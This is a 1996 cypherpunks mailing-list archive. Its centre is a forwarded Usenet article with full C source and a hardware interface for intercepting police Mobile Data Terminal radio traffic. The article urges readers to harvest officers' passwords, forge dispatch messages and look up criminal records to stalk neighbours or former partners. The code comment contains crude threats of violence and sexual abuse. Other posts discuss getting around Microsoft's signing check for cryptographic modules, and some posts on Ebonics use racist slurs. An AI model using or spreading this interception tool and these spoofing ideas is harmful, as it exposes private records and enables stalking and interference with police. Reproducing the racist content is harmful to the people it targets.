in the executable.  Certainly I could rip it out and inject it into an unsigned
but otherwise identical copy outside the U.S., but that is obviously not
going to be legal under ITAR.

ITAR is wrong and should be abolished, but that sort of weasling isn't 
going to make something legal under the current laws.

---

More interesting would be the OS patch that allows an unsigned 
(or signed by someone other than MS) CSP to be loaded...

Hmm, logically the patch must be built in and only need to be 
switched on as it would be too annoying to debug a CSP if you
needed to get it signed every time you built a new version.

Microsoft's Authenticode system had such a patch at one time
for just that purpose, and all it required was a registry setting.

regards,
-Blake  (off to grep around inside some binaries)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Mon, 23 Dec 1996 20:15:53 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
In-Reply-To: <v03007800aee2364954fd@[207.167.93.63]>
Message-ID: <Pine.NEB.3.95.961223232514.20349A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Dec 1996, Timothy C. May wrote:

> _government publications_, I think this problem is solved by anarchy. Short
> of anarchy, I don't see how any government larger than a truly tiny core
> set can possibly pubish official documents, ballots, traffic signs,
> driver's license tests, and so on, in the several dozen languages that the
> basic brown types are now clamoring for.

But Tim, you've just hit on the perfect solution!  How 'bout each year the
CPunks lobby for another language to be protected?  When no law can be
passed without being first translated into over 1000 languages, lawmaking
will be impossible, and our work will be done.

Seriously, though, most of the discussion of the Ebonics issue on this list
has been based on a dangerous misconception.  At no point has _anyone_
suggested that courses be taught in Ebonics, that Ebonics be taught as a
language, or that all faculty be fluent in Ebonics.

What _has_ happened is that Ebonics has been added to the list of languages
which some students are coming into the school program speaking better than
they speak English.  Ebonics just goes alongside Spanish, several dialects
of Chinese, and a number of other languages whose native speakers may get
help from the school district in learning English.

I think this approach is foolishness, as it stigmatizes and seperates a
group who are not already cut off from the rest of the community, unlike
speakers of other designated languages.  (Unlike Laotian or Spanish, a
`native speaker' of Ebonics can understand `standard' english).  This is
a far cry from the `mandataed speaking of Ebonics' which CPunks seem so
up in arms about.  No such program exists or has existed.

At any rate, as someone already pointed out, the main reason for the
designation of Ebonics as a language is that it overnight doubled the
number of students whom Oakland can count towards federal matching funds
for ESL...

--
				Jim Wise
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 23 Dec 1996 20:50:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lack of security of police Mobile Data Terminals (MDTs)
Message-ID: <9612240450.AA24404@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Some months ago I posted an article to cypherpunks commenting
on how easy it is to intercept the supposedly secret traffic on 
the Motorola mobile data terminals used by many police forces to access
criminal history and other sensitive information.  This data is
not seriously encrypted (or encrypted at all in most systems) and
illustrates the kind of security by obscurity that some people would
like to see continue as the only protection for such information as
it is broadcast to the world on open radio channels.

	Apparently someone saw my comments or had similar thoughts and
today I found the following article posted to alt.radio.scanner. I do
not know who the author is, and I did not write the article myself - but
I think the article may interest some members of the list as it
illustrates what civilian cryptography would be like if the NSA had its
way...


						Dave Emery N1PRE
						die@die.com
						DIE Consulting
						Weston Mass.



-----------------------  Begin quoted article ----------------------


>From lord@heaven.com Mon Dec 23 23:11:43 EST 1996
Article: 44420 of alt.radio.scanner
Xref: world alt.radio.scanner:44420
Path: world!blanket.mitre.org!news.tufts.edu!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!newsfeed.internetmci.com!news.ro.com!news
From: lord <lord@heaven.com>
Newsgroups: alt.radio.scanner
Subject: MDT stuff
Date: Mon, 23 Dec 1996 16:04:39 -0600
Organization: screw
Lines: 765
Message-ID: <32BF01F6.2742@heaven.com>
Reply-To: lord@heaven.com
NNTP-Posting-Host: ts2p5.ro.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii; name="Mdt.txt"
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 3.0 (Win95; I)
Content-Disposition: inline; filename="Mdt.txt"


Greetings one and all,

     Have you ever lusted to decode Mobile Data Terminal (MDT)
tranmissions? Have you ever wanted to see the same NCIC and motor
vehicle information that law enforcement officers see? Have you ever
wanted to see what officers send to each other over "private" channels?
And all this with an interface you can build with only a few dollars
worth of parts from your local radio shack?

     If so this posting might be your rendevous with destiny. The tail
end of this posting includes the source code of a program that decodes
and displays MDT messages. It stores roughly 30k of messages in a buffer
and then writes the whole buffer to a file called "data.dat" before
terminating. The program may be interrupted at any time by pressing any
key (don't use control-c) at which point it writes the partially filled
buffer to "data.dat". This program only works for systems built by
Motorola using the MDC4800 tranmission protocol. This accounts for a
large fraction of public service MDT systems as well other private
systems.

     The existence of this program is ample evidence that Motorola has
misrepresented its MDT systems when it marketed them as a secure means
of communcications. The interested reader will soon discover that these
systems do not use any form of encryption. Security concerns instead
have been dealt with by using a code. "And what might this code be
called?" asks the reader. The code turns out to be plain ASCII. What
follows is a brief description of how the program and the MDC4800
protocol work. If you don't understand something go to your local
library and check out a telecommunications theory book.

     1. The raw transmission rate is 4800 baud. The program's interrupt
service routine simply keeps track of the time between transitions. If
you're receiving a perfect signal this will be some multiple of 1/4800
seconds which would then give you how many bits were high or low. Since
this is not the best of all possible worlds the program instead does the
following: transitions are used to synchronize a bit clock. One only
samples whenever this clock is in the middle of the bit to produce the
raw data stream. This greatly reduces jitter effects.

     2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit
 synchronization (a sequence of 1010101010101010....). In the program
 this will result in receive bit clock synchronization. There is no need
 to specifically look for the bit sync.

    3. Look for frame synchronization in raw bit stream so that data
frames can be broken apart. Frame synchronization consists of a 40 bit
sequence : 0000011100001001001010100100010001101111. If this sequence is
detected (or 35 out of 40 bits match up in the program) the system is
idling and the next 112 bit data block is ignored by the program. If the
inverted frame sync is detected one immediately knows that 112 bit data
blocks will follow.

    4. Receive the 112 bit data block and undo the bit interleave. This
means that one must reorder the bits in the following sequence : {0,16,
32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence
were received as {0,1,2,3,4,5,6,7,8,...}.

     5. Check the convolutional error correcting code and count the
number of errors. The error correcting code is rate 1/2 which means we
will be left with 56 data bytes. The encoder is constructed so that the
output consists of the original data bits interspersed with error
correcting code. The generating polynomial used is :
                 1 + X^-1 + X^-5 + X^-6
Whenever an error is detected a counter is incremented. An attempt is
made to correct some errors by finding the syndrome and looking for the
bogus bit.

     6. Keep receiving 112 bit data blocks until either a new frame sync
is found or two consecutive data blocks have an unacceptably large
number of errors.

     7. Each data block consists of six data bytes; the last 8 bits are
status bits that are simply ignored. The program shows the data in two
columns - hexadecimal and ASCII. This data is kept in a buffer and is
written to the file "data.dat" when the program terminates.

     8. What the program doesn't do: As a further check on the data
there can be CRC checks. This varies from protocol to protocol so this
program does not implement the CRC checks. Nonetheless, it is a
relatively trivial matter to find the generating polynomial. The
addresses, block counts, and message ID numbers are also quite easy to
deduce.

As you can see, there is no encryption. The bit interleave and the error
correcting coding are there solely to insure the integrity of the ASCII
data. Since any moron could have figured this stuff out from scratch one
could argue that MDTs do not use "...modulation parameters intentionally
witheld from the public". Therefore the Electronic Communications
Privacy Act may not prohibit receiving MDT tranmissions. However,
consult your attorney to make sure.

     The total disregard for security will no doubt annoy countless
Motorola customers who were assured that their MDT systems were secure.
Since Federal law states that NCIC information must be encrypted your
local law enforcement agency might be forced to spend millions of
dollars to upgrade to a secure MDT system - much to the delight of
Motorola and its stockholders. Cynics might conclude that the release of
a program like this is timed to coincide with the market saturation of
existing MDT systems.

     Also, this program is completely free and it had better stay that
way. What's to prevent you from adapting this into a kit and selling it
>from  classified ads in the back of Nuts and Volts? Nothing. But take a
look at Motorola's patents sometime. You'll notice that this program
does things that are covered by a shitload of patents. So any attempt to
take financial advantage of this situtation will result in utter misery.


Please keep the following in mind: this program only works with the
first serial port (COM1). If your mouse or modem is there too bad. If
you don't like this rewrite the program.


------------------------------------------------------------------------
What equipment do I need?

RADIO SCANNER:

     A scanner that can receive 850-869 MHz. For those of you who don't
know, this is the band where most business and public service trunked
radio systems can be found along with the mobile data terminal
transmissions. Chances are excellent that if your local authorities have
a motorola trunked radio system and mobile data terminals that this is
the frequency band in use. Very rarely will one find mobile data
terminals in other frequency bands.

     Now for the fun part - your scanner should probably be modified to
allow you to tap off directly from the discriminator output. If you wait
until the signal has gone through the radio's internal audio filtering
the waveform will likely be too heavily distorted to be decoded. This is
exactly the same problem that our friends who like to decode pager
transmissions run into - some of them have claimed they can only decode
512 baud pager messages using the earphone output of their scanner.
These mobile data terminal messages are 4800 baud so I don't think you
have a snowball's chance in hell without using the discriminator output.
If you don't know where to begin modifying your scanner you might want
to ask those who monitor pagers how to get the discriminator output for
your particular radio.


COMPUTER/SCANNER INTERFACE

      Those of you who have already built your interface for decoding
pager messages should be able to use that interface without any further
ado. For those starting from scratch - you might want to check out
packages intended for pager decoding such as PD203 and the interfaces
they describe. The following excerpt gives an example of a decoder that
should work just fine (lifted out of the PD203 POCSAG pager decoder
shareware documentation):

>
>   0.1 uF                    |\ +12v
> ---||-----------------------|- \|
> AF IN    |                  |741 \
> ----     |                  |    /--------------------- Data Out
>     |    \            ------|+ /|  |                    CTS (pin 5/8)
>     |    / 100K       |     |/-12v |                 or DSR (pin 6/6)
>     |    \            |            |
>    GND   /            ----/\/\/\----         GND ------ GND (pin 7/5)
>          |            |    100K
>          |            \                  N.B. Pin Numbers for com port are
>         GND           /                  given as x/y, where x is for a 25
>                       \  10K             way, y for a 9 way.
>                       /
>                       |
>                      GND
>
> The  above circuit is a Schmitt Trigger, having thresholds of about +/- 1v.
> If such a large threshold is not required, eg for a  discriminator  output,
> then  the  level of positive feedback may be reduced by either reducing the
> value of the 10K resistor or by increasing the value of the  100K  feedback
> resistor.
>
> The +/- 12v for the op-amp can be derived from unused signals  on  the  COM
> port (gives more like +/- 10v but works fine !):-
>
>
>    TxD (2/3) --------------|<-------------------------------------- -12v
>                                     |                  |
>    RTS (4/7) --------------|<--------       GND        - -
>                   |                          |         _ +  10uF
>                    --------->|-------        - -       |
>                    Diodes 1N4148    |        - + 10uF  GND
>                                     |        |
>    DTR (20/4) ------------->|-------------------------------------- +12v
>

If I were building this circuit I would strongly suggest tying the
non-inverting (+) input of the op-amp to ground since you are working
directly with the discriminator output and don't need a Schmitt trigger.
All these parts or equivalents are easily available (even at your local
Radio Shack which stocks the finest collection of components that have
failed the manufacturer's quality control checks and supported by a
sales staff that's always got the wrong answers to your questions).

Also: DO NOT use the RI (ring indicator) as an input to the computer.

-------------------------------------------------------------------------

How do I check things?

     As a first step, I would get a package such as PD203 and use it to
decode a few pages. If you can get that working you know that that your
interface circuit is functioning correctly.

     If you are in a reasonably sized town you might be part of the
ardis network. The ardis network is a nationwide commercial mobile data
terminal network where one can send/receive E-mail messages from one's
portable computer. It has been exclusively assigned the frequency of
855.8375 MHz. Therefore, if you can hear digital bursts on this
frequency you are basically guarranteed that these are MDC4800 type
messages. You should be able to get stuff popping up on your screen
although a lot of the messages will not be plain english.

     If your interface works but you can't seem to get any messages on
the screen for a channel you know is a Motorola MDT system then it might
be possible that your scanner/interface is putting out data with the
polarity reversed. To check for this run the program with a command line
arguement. When it runs you should an initial "Polarity reversed"
message and hopefully then things will work out for you.

     Other than that: if this program doesn't work pester someone else
who has got it working. Don't bother pestering the author(s) of this
posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand
lawyers from Motorola descending like fleas to infest their pubic hair
and accordingly have decided to remain forever anonymous. No doubt
someone on the usenet who sees this post will know what to do with this
program and also hopefully rewrite into a more user friendly form. When
you do please don't forget to release the source code.

-------------------------------------------------------------------------

Future projects/nightmares you might want to think about:

     Certain MDT systems embed formatting information in the text in the
form of ESC plus [ plus a few more bytes. Someone might want to decode
these on the fly and format the output so it looks exactly the same way
as the user sees it.

     Make it so that this program works with com ports other than COM1.

     Make it user friendly?

     Enlarge the data buffer from the current 30k.

     Give the output data file an unique name each time the program is
run instead of "data.dat".

     How about sorting through the past traffic so that you only see
traffic to a specified user?

     The program does not cut data blocks off in the display but it
might add an extra one or two (which will display as all zeroes).
Someone might want to make all those zeroes be shown as blanks instead.

     Write some real instructions.


Now the more ambitous stuff:

     Are you half-way competent with RF engineering? Then listen in to
the tranmissions from the mobile units back to the base station. That
way you get everyone's password and user IDs as they log on to the MDT
system. By this point you will no doubt have been able to figure out all
of the appropriate communications protocols so you should think about
getting your own transmitter up and running along with the necessary
program modifications so that you can transmit MDT messages. The
required transmitter can be very simple - for example, those masocists
who want to start from scratch might want to special order an
appropriate crystal (pulling the frequency with the computer's tranmit
signal), building a frequency multiplier chain, and adding a one watt RF
amplifier to top it all off (see the appropriate ARRL publications for
more information on radio techniques). Now you can log in and look at
the criminal records and motor vehicle information on anybody you can
think of. Find out what your neigbors are hiding. Find out who that
asshole was that cut you off downtown. Find out where your former
girl/boy friend is trying to hide from you. And on and on...
     Those with simpler tastes might want to simply transmit at the base
station's frequency to any nearby MDT terminal - now you too can
dispatch your local law enforcement agencies at the touch of your
fingers!!! See your tax dollars at work tearing apart every seam of your
neighbor's house. Or create strife and dissension in your local law
enforcement agency as more and more officers come out of the closet
using their MDTs trying to pick up fellow officers.

     There are municipalities that have put GPS receivers on all of
their vehicles. Should it happen that the information is sent back over
one of these networks you could have your computer give you a real-time
map showing the position of every vehicle and how far away they are from
you.

     Extend your knowledge to other data networks. Here you will want to
look at the RAM mobile data network. It uses the MOBITEX protocol which
is really easy to find information on. Since it is an 8 kilobaud GMSK
signal there is a decent chance that you can use the interface described
here. This transmission mode demmands much more from your equipment than
MDT tranmissions. At the very least you must be much more careful to
make sure you have adequate low frequency response. Despite this it is
possible to receive and decode MOBITEX transmissions with a simple
op-amp circuit! This just goes to show you what drivelling bullshit
RAM's homepage is filled with - they explain in great detail how hackers
will never be able to intercept user's radio tranmissions (incidentally
explaining how to decode their tranmissions). The necessary program will
be the proverbial exercise left for the reader. For better performance
buy a dedicated MOBITEX modem chip and hook it up to your computer.

-----------------------------------------------------------------------

A few words about the program:

     Remember - you must have your decoder hooked up to COM1. The RTS
line will be positive and the DTR line negative but if you built the
decoder with a bridge rectifier you really don't have to worry about
their polarity. Stop the program by punching any key; don't use
control-c or control-break!

     If you must reverse polarity run the program with any command line
arguement (example: type in "mdt x" at the command line if your program
is mdt.exe). You should then see the "Polarity Reversed." message pop up
and hopefully things will then work.

     As far as compiling this - save the latter portion of this posting
(the program listing) and feed it to a C compiler. Pretty much any C
compiler from Borland should work. If you (Heaven Forbid) use a
Microsoft C compiler you might need to rename some calls such as
outport. Follow any special instructions for programs using their own
interrupt service routines. This program is not object oriented. It also
does not want anything whatsoever to do with Windows. Please don't even
think about running this program under Windows. Finally, here it is:


                Good Luck and may God be with you!

---------------------- C u t   H e r e ! ! ! --------------------------

/*  start of program listing */

#include <stdio.h>
#include <conio.h>
#include <dos.h>
#include <math.h>

/* Purpose of program: receive messages using the Motorola MDC4800    */
/* protocol and show them on the screen                               */
/*                                                                    */
/* WARNING TO ALL : This program is free. Please distribute and modify*/
/* this program. I only request that you always include the source    */
/* code so that others may also learn and add improvements. The       */
/* status of this program at the time of the original release is :    */
/* it doesn't have much in the way of a user interface or options but */
/* it should work if you follow the procedure in the text file. Don't */
/* expect any sort of support (you get what you pay for - nothing in  */
/* this case). Finally, here's a special message to all of you who    */
/* might have the urge to try to make money with this information:    */
/* I know where you live. I will shave your pets and pour rubbing     */
/* alcohol all over them (unless said pet happens to be a Rottweiler).*/
/* I will have sex with your wife while you off at work; on the rare  */
/* occasions when you have sex with your wife she will in the throes  */
/* of passion cry not your name but mine. I will sell drugs to the    */
/* demented spawn you refer to as your children. And if that's not    */
/* enough for you let a thousand lawyers from motorola descend on you */
/* and pound your fat rear end so far into the ground that it finally */
/* sees daylight again somewhere in Australia.                        */
/*                                                                    */
/*                                                                    */
/* General tidbits (a few of those "Why were things done this way     */
/* questions).                                                        */
/* 1. Why is captured data kept in an array and only written to a     */
/* disk file at the very end? Because disk access seems unreliable    */
/* when so much time is taken up by the background interrupt service  */
/* routine.                                                           */
/* 2. Why is the array storing this so small? Because yours truly was */
/* too damn lazy to use a pointer and allocate a huge chunk of memory.*/
/* (Hint for those of you who would like to improve this.             */
/*--------------------------------------------------------------------*/

/* global variables */
int lc=0;
char fob[30000];/* output buffer for captured data to be sent to disk */
int foblen=29900;
int fobp=0;	/* pointer to current position in array fob	      */
char ob[1000];  /* output buffer for packet before being sent to screen */
int obp=0;	/* pointer to current position in array ob		*/

static unsigned int buflen= 15000;      /* length of data buffer      */
static volatile unsigned int cpstn = 0; /* current position in buffer */
static unsigned int fdata[15001] ;      /* frequency data array       */

void interrupt (*oldfuncc) (); /* vector to old com port interrupt    */

/**********************************************************************/
/*                                this is serial com port interrupt   */
/* we assume here that it only gets called when one of the status     */
/* lines on the serial port changes (that's all you have hooked up).  */
/* All this handler does is read the system timer (which increments   */
/* every 840 nanoseconds) and stores it in the fdata array. The MSB   */
/* is set to indicate whether the status line is zero. In this way    */
/* the fdata array is continuously updated with the appropriate the   */
/* length and polarity of each data pulse for further processing by   */
/* the main program.						      */
void interrupt com1int()
{
  static unsigned int d1,d2,ltick,tick,dtick;

  /* the system timer is a 16 bit counter whose value counts down     */
  /* from 65535 to zero and repeats ad nauseum. For those who really  */
  /* care, every time the count reaches zero the system timer 	      */
  /* interrupt is called (remember that thing that gets called every  */
  /* 55 milliseconds and does housekeeping such as checking the       */
  /* keyboard.                                                        */
  outportb (0x43, 0x00);       /* latch counter until we read it      */
  d1 = inportb (0x40);         /* get low count                       */
  d2 = inportb (0x40);         /* get high count                      */

  /* get difference between current, last counter reading             */
  tick  = (d2 << 8) + d1;
  dtick = ltick - tick;
  ltick = tick;

  if ((inportb(0x3fe) & 0xF0) > 0) dtick = dtick ^ 0x8000;
			      else dtick = dtick & 0x3fff;

  fdata[cpstn] = dtick;        /* put freq in fdata array             */
  cpstn  ++;                   /* increment data buffer pointer       */
  if (cpstn>buflen) cpstn=0;   /* make sure cpstn doesnt leave array  */

  d1 = inportb (0x03fa);       /* clear IIR                           */
  d1 = inportb (0x03fd);       /* clear LSR                           */
  d1 = inportb (0x03fe);       /* clear MSR                           */
  d1 = inportb (0x03f8);       /* clear RX                            */
  outportb (0x20, 0x20);       /* this is the END OF INTERRUPT SIGNAL */
                               /* "... that's all folks!!!!"          */
}

void set8250 ()                /* sets up the 8250 UART               */
{
  static unsigned int t;
  outportb (0x03fb, 0x00);     /*  set IER on 0x03f9                  */
  outportb (0x03f9, 0x08);     /*  enable MODEM STATUS INTERRUPT      */
  outportb (0x03fc, 0x0a);     /*  push up RTS, DOWN DTR              */
  t = inportb(0x03fd);         /*  clear LSR                          */
  t = inportb(0x03f8);         /*  clear RX                           */
  t = inportb(0x03fe);         /*  clear MSR                          */
  t = inportb(0x03fa);         /*  clear IID                          */
  t = inportb(0x03fa);         /*  clear IID - again to make sure     */
}

void set8253()                 /*  set up the 8253 timer chip         */
{                              /* NOTE: ctr zero, the one we are using*/
                               /*  is incremented every 840nSec, is   */
                               /*  main system time keeper for dos    */
  outportb (0x43, 0x34);       /* set ctr 0 to mode 2, binary         */
  outportb (0x40, 0x00);       /* this gives us the max count         */
  outportb (0x40, 0x00);
}

/****************************************************************/

int pork(int l)
{
  static int s=0,sl=0x0000,t1,asp=0,ll,k,v,b,tap,synd=0,nsy;
  static char line[200]; /* array used to format 112 bit data chunks */
  static int lc=0;	 /* pointer to position in array line	     */
  if (l == -1)
  {
/*    printf ("  %2i\n",asp); */
    sl = 0x0000;
    s = 0;
    synd = 0;
    if ((asp <12) && (lc > 50))
    {
      ll = 12 - asp;
      for (ll=0; ll<6; ll++)
      {
	v = 0;
	for (k=7; k>=0; k--)
	{
	  b = line[ (ll<<3) +k ];
	  v = v << 1;
	  if ( b == 49) v++;
	}
	ob[obp] = (char) v;
	if (obp < 999) obp++;
      }
    }
    lc = 0;
    tap = asp;
    asp = 0;
    return(tap);
  }
  else
  {
    s++;
    if (s==1)
    {
      line[lc] = (char) l;
      lc++;
    }

    /* update sliding buffer */
    sl = sl << 1;
    sl = sl & 0x7fff;
    if (l == 49) sl++;

    if (s >1)
    {
      s = 0;

      if ((sl & 0x2000) > 0) t1 = 1; else t1 = 0;
      if ((sl & 0x0800) > 0) t1^=1;
      if ((sl & 0x0020) > 0) t1^=1;
      if ((sl & 0x0002) > 0) t1^=1;
      if ((sl & 0x0001) > 0) t1^=1;

      /* attempt to identify, correct certain erroneous bits */

      synd = synd << 1;
      if (t1 == 0)
      {
	asp++;
	synd++;
      }
      nsy = 0;
      if ( (synd & 0x0001) > 0) nsy++;
      if ( (synd & 0x0004) > 0) nsy++;
      if ( (synd & 0x0020) > 0) nsy++;
      if ( (synd & 0x0040) > 0) nsy++;
      if ( nsy >= 3)  /* assume bit is correctable */
      {
	printf ("*");
	synd = synd ^ 0x65;
	line[lc - 7] ^= 0x01;   /**********************************************/
      }


    }

  }
  return(0);
}

void shob()
{
  int i1,i2,j1,j2,k1;

  /* update file output buffer */
  i1 = obp / 18;
  if ( (obp-(i1*18)) > 0) i1++;
  fob[fobp] = (char) (i1 & 0xff);
  if (fobp < 29999) fobp++;
  for (i2 = obp; i2<=(obp+20); i2++) ob[i2] = 0;
  for (j1 = 0; j1 < i1; j1++)
  {
    for (j2 = 0; j2 < 18; j2++)
    {
      k1 = j2 + (j1*18);
      printf("%02X ", ob[k1] & 0xff);
      fob[fobp] = (char) (ob[k1] & 0xff);
      if (fobp < 29999) fobp++;
    }
    printf ("    ");
    for (j2 = 0; j2 < 18; j2++)
    {
      k1 = j2 + (j1*18);
      if (ob[k1] >=32) printf("%c",ob[k1]); else printf(".");
    }
    printf("\n");
  }

  obp=0;
  printf("BUFFER: %3i percent full\n",(int)(fobp/299.0));
}

/**********************************************************************/
/*                      frame_sync                                    */
/**********************************************************************/
/* this routine recieves the raw bit stream and tries to decode it    */
/* the first step is frame synchronization - a particular 40 bit      */
/* long sequence indicates the start of each data frame. Data frames  */
/* are always 112 bits long. After each 112 bit chunk this routine    */
/* tries to see if the message is finished (assumption - it's finished*/
/* if the 40 bit frame sync sequence is detected right after the end  */
/* of the 112 bit data chunk). This routine also goes back to hunting */
/* for the frame sync when the routine processing the 112 bit data    */
/* chunk decides there are too many errors (transmitter stopped or    */
/* bit detection routine skipped or gained an extra bit).	      */
/*                                                                    */
/* inputs are fed to this routine one bit at a time                   */
/* input : 48 - bit is a zero                                         */
/*         49 - bit is a 1                                            */

void frame_sync(char gin)
{
  static unsigned int s1=0,s2=0,s3=0,nm,j,t1,t2,t3,ns=0,st=0,n,m,l,chu=0,eef=0;
  static char ta[200];

  if (st == 1)
  {
    ta[ns] = gin;
    ns++;
    if (ns >= 112)   /* process 112 bit chunk */
    {
      chu++;
      ns = 0;
      for (n= 0; n<16; n++)
      {
	for (m=0; m<7; m++)
	{
	  l = n + (m<<4);
	  pork(ta[l]);
	}
      }
      if (pork(-1) > 20) eef++; else eef=0;
      if (eef > 1)  /* if two consecutive excess error chunks - bye  */
      {
	st = 0;
	shob();
	eef = 0;
      }
/*      else eef = 0; */
    }
  }

    /* s1,s2,s3 represent a 40 bit long buffer */
    s1 = (s1 << 1) & 0xff;
    if ((s2 & 0x8000) > 0) s1++;
    s2 = (s2 << 1);
    if ((s3 & 0x8000) > 0) s2++;
    s3 = (s3 << 1);
    if (gin == 49) s3++;

    /* xor with 40 bit long sync word */
    t1 = s1 ^ 0x0007;
    t2 = s2 ^ 0x092A;
    t3 = s3 ^ 0x446F;

    /* find how many bits match up */
    /* currently : the frame sync indicates system id / idling / whatever */
    /*        inverted frame sync indicates message follows             */
    nm = 0;
    for (j=0; j<16; j++)
    {
      if (t1 & 1) nm++;
      if (t2 & 1) nm++;
      if (t3 & 1) nm++;
      t1 = t1 >> 1;
      t2 = t2 >> 1;
      t3 = t3 >> 1;
    }

    if (nm <  5)
    {
      st = 1;
      ns = 0;
    }
    else if (nm > 35)
    {
      if (st==1)
      {
	shob();
      }
      st = 0;
      ns = 0;
    }
}

void main (int argc)
{
  unsigned int n,i=0,j,k,l,cw1=49,cw0=48;
  FILE *out;
  char s=48;
  double pl,dt,exc=0.0,clk=0.0,xct;

  if (argc > 1)
  {
    printf ("Reverse Polarity.\n");
    cw1 = 48;
    cw0 = 49;
  }

  /* dt is the number of expected clock ticks per bit */
  dt =  1.0/(4800.0*838.8e-9);

  oldfuncc = getvect(0x0c);    /* save COM1 Vector                    */
  setvect (0x0c, com1int);     /* Capture COM1 vector                 */


  n = inportb (0x21);          /* enable IRQ4 interrupt               */
  outportb(0x21, n & 0xef);

  set8253();                   /* set up 8253 timer chip              */

  set8250();                   /* set up 8250 UART                    */

  while ((kbhit() == 0) && (fobp<29900))
  {
   if (i != cpstn)
   {
    if  ( ( fdata[i] & 0x8000) != 0) s = cw1; else s = cw0;

    /* add in new number of cycles to clock  */
    clk += (fdata[i] & 0x7fff);
    xct = exc + 0.5 * dt;  /* exc is current boundary */
    while ( clk >= xct )
    {
      frame_sync(s);
      clk = clk - dt;
    }
    /* clk now holds new boundary position. update exc slowly... */
    /* 0.005 sucks; 0.02 better; 0.06 mayber even better; 0.05 seems pretty good */
    exc = exc + 0.020*(clk - exc);

    i++;
    if( i >buflen) i = 0;
   }

  }

  outportb (0x21, n);          /* disable IRQ4 interrupt              */
  setvect (0x0c, oldfuncc);    /* restore old COM1 Vector             */


  /* save captured data to disk file	*/
  i = 0;
  out = fopen("data.dat","wt");
  if (out == NULL)
  {
    printf ("couldn't open output file.\n");
    exit(1);
  }

  i = 0;
  while ( (i < fobp) && (i < 29800))
  {
    j = ((int)fob[i] & 0xff);
    i++;
    for (k=0; k<j; k++)
    {
      for (l=0; l<18; l++)
      {
	fprintf(out,"%02X ",((int) fob[i + l]&0xff));
      }
      fprintf(out,"    ");
      for (l=0; l<18; l++)
      {
	n = ((int)fob[i]&0xff);
	i++;
	if (n >=32) fprintf(out,"%c",n); else fprintf(out,".");
      }
      fprintf(out,"\n");
    }
    fprintf(out,"\n");
  }
  fclose(out);
}




/*  end of program listing  */










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 24 Dec 1996 01:58:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Papers Galore, address correction
Message-ID: <199612240958.BAA10235@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

> Date: Mon, 23 Dec 1996 15:16:39 -0500
> To: cypherpunks@toad.com
> From: John Young <jya@pipeline.com>
> Subject: Papers Galore
> 
> The NSA-hosted National Information Systems Security
> Conference, held in October, 1996, has made a wide
> range of papers available (in PDF format), and listed in:
> 
>   http://csrc.nist.gov/nissc/1996/papers/NISSC/toc.pdf (110kb)
>                                          ^^^^^

    				should be NISSC96

    Happy Holidays

    b
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@veracruz.net (Adam Breaux)
Date: Mon, 23 Dec 1996 23:30:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption Algorithms
Message-ID: <19961224073216350.AAA253@monalisa>
MIME-Version: 1.0
Content-Type: text/plain


Is there a good source on the net for implemented C/C++ routines such 
as a DES algorithm? I am a programmer in need of some fairly secure 
encryption routine. Any help would be greatly appreciated.

Thanks
AdamX
---
Adam Breaux
admin@veracruz.net
http://www.veracruz.net       {Corporate Page }
http://www.abyss.com          {Extracurricular}
http://www.iso-america.com    {In Search Of...}

"Violence is a cruel world doing what it 
does best...break the habit...BE NICE" --- me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Tue, 24 Dec 1996 01:57:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Unsubscribing Dr. Vulius
In-Reply-To: <T59eZD46w165w@bwalk.dm.com>
Message-ID: <32BFC56B.2E91@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


> ]To: cypherpunks@toad.com, gnu@toad.com
> ]Subject: Dr. Vulis is not on cypherpunks any more
> ]From: John Gilmore <gnu@toad.com>

> ]As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
> ]list, and indeed majordomo@toad.com HAS been instructed to ignore his
> ]requests to resubscribe.
> ]
> ]The cypherpunks list is for discussions centered around cryptography.

   I agree totally.  My friends in Berkeley agree that cryptography 
discussions should stick to more relevant topics, like Ebonics.  We had
a lively debate, over tea and crumpets, the other day, and decided that 
it was well worth sorting through pages and pages of 'crackers' making 
fun of 'niggah tok' in order to find out that crack dealers are using
'street cryptography.'
   As well, there were some enlightening posts re: Ebonics syntax; 
clarifying the proper use of 'dis' and 'dat'.

   Some in our group were of the mind that Dr.VD K's occasional rants 
in regard to mass slaughter were a timely reminder of the end result 
of individuals, groups, or governments being able to 'classify' us 
into categories that can be marked for 'deletion'.
   But they were mostly 'domestic' tea-drinkers, anyway, so their views
are really of little importance.  The majority were happy that you 
marked Dr. DV K for 'deletion'.

   Our topic of discussion tomorrow will be, "Censorship / The 'Final
Solution' to Dr. DV K, Or Just 'Attack Cryptography'?"
   There are those of the mind that censorship is comparable to
distributing 'bogus' copies of a person's Public Key, and scrambling
their Private Key, effectively denying them any communication with
society.  However, these people are, once again, the 'domestic' tea-
drinkers.

   I am sure that your actions in regard to Dr. Vulius will be a strong 
message to other CypherPunks that they had better toe-the-line, or else.
   Perhaps it would also be useful to go through the CypherPunk archives 
and send personal warnings to those on the list who appear to have
encouraged him in the past.  If their postings leave their attitude 
unclear in your mind, then you might want to check their 'web history'
